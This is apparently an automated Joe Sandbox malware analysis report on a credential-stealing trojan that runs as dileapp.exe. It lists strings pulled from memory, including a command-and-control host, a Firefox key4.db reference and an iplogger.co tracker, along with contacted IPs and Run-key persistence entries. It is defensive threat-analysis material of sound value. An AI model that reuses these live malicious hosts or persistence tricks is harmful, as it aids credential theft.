                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17dileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812680278.0000000005806000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006006000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C16000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://water-acidict.cyou/apiCdileapp.exe, 00000009.00000002.1969913350.000000000098F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.000000000098F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://water-acidict.cyou:443/api.dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYidileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://x1.c.lencr.org/0dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://x1.i.lencr.org/0dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installdileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchdileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://water-acidict.cyou/#dileapp.exe, 0000000F.00000003.2124178934.0000000000F6C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124130973.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://support.mozilla.org/products/firefoxgro.alldileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgdileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icodileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://water-acidict.cyou:443/apiKdileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctadileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://ocsp.rootca1.amazontrust.com0:dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016dileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812680278.0000000005806000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006006000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C16000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://water-acidict.cyou/rdileapp.exe, 00000009.00000002.1970339338.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1968959051.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://water-acidict.cyou:443/api.default-release/key4.dbPKdileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://water-acidict.cyou/pdileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://crl.microdileapp.exe, 00000005.00000003.1740124665.00000000015BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://water-acidict.cyou/apizdileapp.exe, 0000000F.00000003.2089184015.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2089255852.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgdileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://water-acidict.cyou/zdileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://water-acidict.cyou:443/apildileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://iplogger.co/1tJFB41tJFB4dileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?dileapp.exe, 00000009.00000003.1861142631.0000000005845000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1953167971.0000000006045000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2033695442.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://water-acidict.cyou/apiqdileapp.exe, 00000009.00000003.1888558428.0000000000A06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou/xdileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou:443/apitPKdileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou/bdileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou/apicudileapp.exe, 00000009.00000002.1970314600.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969357381.00000000009F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou/apihdileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou:443/apidileapp.exe, 00000005.00000003.1740218351.0000000001551000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000002.1749018639.0000000001551000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou/apiedileapp.exe, 0000000C.00000003.1980496225.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980557308.0000000006035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://water-acidict.cyou:443/api_dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesdileapp.exe, 00000009.00000003.1812680278.00000000057E2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000005FE2000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005BF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://water-acidict.cyou/apixddileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://contile-images.services.mozilla.com/obgoOYdileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://support.microdileapp.exe, 00000009.00000003.1812600714.0000000005864000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.0000000006062000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://iplogger.co/https://iplogger.co/1tJFB4iplogger.co/1tJFB4dileapp.exe, 00000009.00000003.1812680278.0000000005801000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1812600714.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901988721.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1902203136.0000000006001000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984241620.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1984503676.0000000005C11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://water-acidict.cyou/dileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1970391801.0000000000A15000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969486720.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1888884625.0000000000A14000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1968959051.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1888558428.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811421821.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1927382793.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1951791615.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052600366.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2055278689.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980496225.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2045066427.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1952787217.0000000006035000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050815274.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980677857.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980367222.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050916966.0000000001B1A000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001B0F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://water-acidict.cyou/apiadileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      239.255.255.250
                                                                                      		unknownReserved
                                                                                      		unknownunknownfalse
                                                                                      104.21.82.93
                                                                                      		unknownUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      172.67.156.217
                                                                                      		water-acidict.cyouUnited States
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      172.67.167.249
                                                                                      		iplogger.coUnited States
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      142.250.181.100
                                                                                      		www.google.comUnited States
                                                                                      		15169GOOGLEUSfalse

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.4

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1565453
                                                                                      Start date and time:2024-11-29 23:09:07 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 6m 32s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:17
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:file.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@32/5@9/6
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 20%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 74.125.205.84, 34.104.35.123, 23.218.208.109, 93.184.221.240, 192.229.221.95, 172.217.17.67, 172.217.17.46
                                                                                      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, e16604.g.akamaiedge.net, update.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 3696 because there are no executed function
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 5448 because there are no executed function
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 7568 because there are no executed function
                                                                                      • Execution Graph export aborted for target dileapp.exe, PID 7984 because there are no executed function
                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: file.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      17:10:03API Interceptor26x Sleep call for process: dileapp.exe modified
                                                                                      22:09:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
                                                                                      22:10:04AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe
                                                                                      22:10:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\dileapp.exe

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      239.255.255.250file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                https://protect.checkpoint.com/v2/r01/___https://clickeu.actmkt.com/xd5/7-ai55b68h-a5f*~*-96gf-biba-/k*~*6/*~*c/kjha?jsw=sffmnfizfgDff9Dfmnfh*~*fgufgwvf8ffs9fmpfijfgvvfDDfrrflpfiyfgEvfrnflffixfgxffCff9nftzflxfiBfgCvf8ffsjfl9fikffCff9vftzfh*~*fimff8vf/vfqjfiffgufg*~*ff8nfrjfl9figfgyvfEnftnfjffinfgzvf8ffsvfmlfiofgxffEnfszflhfitfgCvf9vfszflvfgtfgwvf8DfszfmDfgDfg*~*ffafflffipfgxffBvfsDfrvfiffgvff9ffrnflrfllfgsff8vfrffrjfirfgsff7ffrnfrnflhfgsff9ffEffmffitfgsff7vfEvflDfihfgAff8fftnflzflrfikfgwvfsDfuvfiffgAff9vfqnfrnfihfiiff9ffsfflDflpfgBffBvftnflDfitfgyffBvfsfflzflrfikffBvftfflnflpfgCffBvfEvfmfflpfilfgxvfsffrzflrfihff8vfrvflrfmDfgvffDffrnfkzfllfgxfgwffrvfl9flpfgAfgwffqnfmjfipfiiff7vfqnflvfllfiiff8vfqnfmffllfgwfgwffqnflDfilfgDffEffDDfmffinfgxfgxvfsvfmffijfi9fg*~*ffvnfuvff====___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOjczN2NjZDA5MTMxODVlMzdkYWUzNjFjZjM4Yzg3Y2ZlOjc6ZjRkNToxN2E5YzZkNWIxZGY2MjgxODRlOTdhNmI5MDkxMDNmY2VkOTNmZGVmZWNhODNlZDEwNTdjNGFkZGY2ZGVlMDc5Omg6VDpUGet hashmaliciousUnknownBrowse
